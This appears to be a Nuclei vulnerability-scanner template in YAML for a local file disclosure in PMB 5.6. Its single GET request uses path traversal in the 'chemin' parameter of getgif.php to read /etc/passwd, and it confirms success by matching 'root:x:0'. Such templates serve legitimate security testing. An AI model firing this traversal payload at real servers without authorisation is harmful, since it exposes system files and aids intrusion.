22 lines
466 B
YAML
22 lines
466 B
YAML
|
id: pmb-local-file-disclosure
|
||
|
|
||
|
info:
|
||
|
name: PMB 5.6 - 'chemin' Local File Disclosure
|
||
|
author: dhiyaneshDk
|
||
|
severity: high
|
||
|
reference: https://www.exploit-db.com/exploits/49054
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "root:x:0"
|